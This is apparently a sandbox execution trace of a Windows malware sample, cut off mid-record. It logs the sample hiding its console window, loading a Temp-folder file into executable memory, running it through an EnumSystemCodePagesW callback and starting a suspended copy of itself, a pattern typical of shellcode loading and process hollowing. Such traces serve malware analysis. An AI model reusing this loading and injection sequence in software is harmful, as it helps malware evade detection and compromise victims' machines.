lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0059.828] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x19f2c8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0059.828] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x19fc98, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x05Hi\x0eÔþ\x19", lpUsedDefaultChar=0x0) returned 256 [0059.828] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd98, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0059.828] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd98, cbMultiByte=256, lpWideCharStr=0x19f4f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ됹BĀ") returned 256 [0059.828] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ됹BĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0059.828] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ됹BĀ", cchSrc=256, lpDestStr=0x19f2e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0059.828] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x19fb98, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x05Hi\x0eÔþ\x19", lpUsedDefaultChar=0x0) returned 256 [0059.828] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x80) returned 0x4ef560 [0059.828] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x453a98, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rvtzlpyrgs.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\rvtzlpyrgs.exe")) returned 0x33 [0059.828] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xd0) returned 0x4f43d0 [0059.828] RtlInitializeSListHead (in: ListHead=0x452f28 | out: ListHead=0x452f28) [0059.829] GetLastError () returned 0x0 [0059.829] SetLastError (dwErrCode=0x0) [0059.829] GetEnvironmentStringsW () returned 0x4fdfc0* [0059.829] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0xa8c) returned 0x4fea58 [0059.829] FreeEnvironmentStringsW (penv=0x4fdfc0) returned 1 [0059.829] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x90) returned 0x4f3960 [0059.829] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x3e) returned 0x4f2278 [0059.829] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x5c) returned 0x4f3a48 [0059.829] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x6e) returned 0x4f3bc0 [0059.829] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x78) returned 0x4ef0b8 [0059.829] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x62) returned 0x4ee388 [0059.829] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x28) returned 0x4fa808 [0059.829] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x48) returned 0x4f0458 [0059.829] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x1a) returned 0x4eabe0 [0059.829] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x3a) returned 0x4f2980 [0059.829] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x62) returned 0x4f34d8 [0059.829] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x2a) returned 0x4f2b90 [0059.829] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x2e) returned 0x4f2ab0 [0059.829] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x1c) returned 0x4eac30 [0059.829] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x144) returned 0x4fb070 [0059.829] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x7c) returned 0x4edef0 [0059.829] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x36) returned 0x4f7130 [0059.829] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x3a) returned 0x4f22c0 [0059.830] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x90) returned 0x4ff518 [0059.830] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x24) returned 0x4fb1c0 [0059.830] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x30) returned 0x4f3098 [0059.830] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x36) returned 0x4f7170 [0059.830] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x48) returned 0x4eff68 [0059.830] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x52) returned 0x4edfb8 [0059.830] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x3c) returned 0x4f2860 [0059.830] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xd6) returned 0x4f20d8 [0059.830] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x2e) returned 0x4f2dc0 [0059.830] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x1e) returned 0x4ea9d8 [0059.830] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x2c) returned 0x4f2ed8 [0059.830] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x54) returned 0x4e6cc0 [0059.830] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x52) returned 0x4efce0 [0059.830] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x24) returned 0x4e6a18 [0059.830] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x42) returned 0x4e6a48 [0059.830] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x2c) returned 0x4f2f10 [0059.830] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x44) returned 0x4f29c8 [0059.830] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x24) returned 0x4e6a98 [0059.831] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4fea58 | out: hHeap=0x4e0000) returned 1 [0059.831] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x800) returned 0x4fdfc0 [0059.831] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0059.831] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4080e9) returned 0x0 [0059.833] GetConsoleWindow () returned 0x7004c [0059.833] ShowWindow (hWnd=0x7004c, nCmdShow=0) returned 1 [0059.838] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x3d0900) returned 0x1f77020 [0059.929] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xdnyr.wb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\xdnyr.wb"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0059.929] GetFileSize (in: hFile=0x1ec, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1562 [0059.930] VirtualAlloc (lpAddress=0x0, dwSize=0x1562, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0059.930] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e0000, nNumberOfBytesToRead=0x1562, lpNumberOfBytesRead=0x19fe68, lpOverlapped=0x0 | out: lpBuffer=0x1e0000*, lpNumberOfBytesRead=0x19fe68*=0x1562, lpOverlapped=0x0) returned 1 [0059.930] EnumSystemCodePagesW (lpCodePageEnumProc=0x1e0000, dwFlags=0x0) [0060.131] GetTempPathW (in: nBufferLength=0x103, lpBuffer=0x19ad90 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0060.131] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpString2="aqqlknbytl.sm" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\aqqlknbytl.sm") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\aqqlknbytl.sm" [0060.132] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\aqqlknbytl.sm" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\aqqlknbytl.sm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0060.132] GetFileSize (in: hFile=0x1f4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1a000 [0060.132] VirtualAlloc (lpAddress=0x0, dwSize=0x1a000, flAllocationType=0x3000, flProtect=0x4) returned 0x4b0000 [0060.133] ReadFile (in: hFile=0x1f4, lpBuffer=0x4b0000, nNumberOfBytesToRead=0x1a000, lpNumberOfBytesRead=0x19af98, lpOverlapped=0x0 | out: lpBuffer=0x4b0000*, lpNumberOfBytesRead=0x19af98*=0x1a000, lpOverlapped=0x0) returned 1 [0060.142] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19a5c8, nSize=0x103 | out: lpFilename="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rvtzlpyrgs.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\rvtzlpyrgs.exe")) returned 0x33 [0060.142] GetCommandLineW () returned="\"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rvtzlpyrgs.exe\" C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xdnyr.wb" [0060.142] CreateProcessW (in: lpApplicationName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rvtzlpyrgs.exe", lpCommandLine="\"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rvtzlpyrgs.exe\" C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xdnyr.wb", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19aca4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19ad50 | out: lpCommandLine="\"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rvtzlpyrgs.exe\" C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xdnyr.wb", lpProcessInformation=0x19ad50*(hProcess=0x1fc, hThread=0x1f8, dwProcessId=0xcf8, dwThreadId=0x8d4)) returned 1 [0060.159] GetThreadContext (in: hThread=0x1f8, lpContext=0x19a9d8 | out: lpContext=0x19a9d8*(ContextFlags=0x10007, Dr0=0x4f3e90, Dr1=0x19a9f4, Dr2=0x77792bfe, Dr3=0x0, Dr6=0x19acd8, Dr7=0x64, FloatSave.ControlWord=0x19ac60, FloatSave.StatusWord=0x77792929, FloatSave.TagWord=0x4f3e98, FloatSave.ErrorOffset=0x19aa50, FloatSave.ErrorSelector=0x64, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x19ad50, FloatSave.RegisterArea=([0]=0xb4, [1]=0x29, [2]=0x79, [3]=0x77, [4]=0x98, [5]=0x3e, [6]=0x4f, [7]=0x0, [8]=0xb8, [9]=0x3e, [10]=0x76, [11]=0x77, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x1, [16]=0x90, [17]=0x3e, [18]=0x4f, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x64, [25]=0x0, [26]=0x8, [27]=0x2, [28]=0x50, [29]=0xaa, [30]=0x19, [31]=0x0, [32]=0x50, [33]=0xaa, [34]=0x19, [35]=0x0, [36]=0xf0, [37]=0xac, [38]=0x19, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x64, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x2, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x43, [65]=0x0, [66]=0x3a, [67]=0x0, [68]=0x5c, [69]=0x0, [70]=0x55, [71]=0x0, [72]=0x73, [73]=0x0, [74]=0x65, [75]=0x0, [76]=0x72, [77]=0x0, [78]=0x73, [79]=0x0), FloatSave.Cr0NpxState=0x52005c, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x214000, Edx=0x0, Ecx=0x0, Eax=0x407a2d, Ebp=0x0, Eip=0x777d8fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x6e, [1]=0x0, [2]=0x62, [3]=0x0, [4]=0x79, [5]=0x0, [6]=0x74, [7]=0x0, [8]=0x6c, [9]=0x0, [10]=0x2e, [11]=0x0, [12]=0x73, [13]=0x0, [14]=0x6d, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, 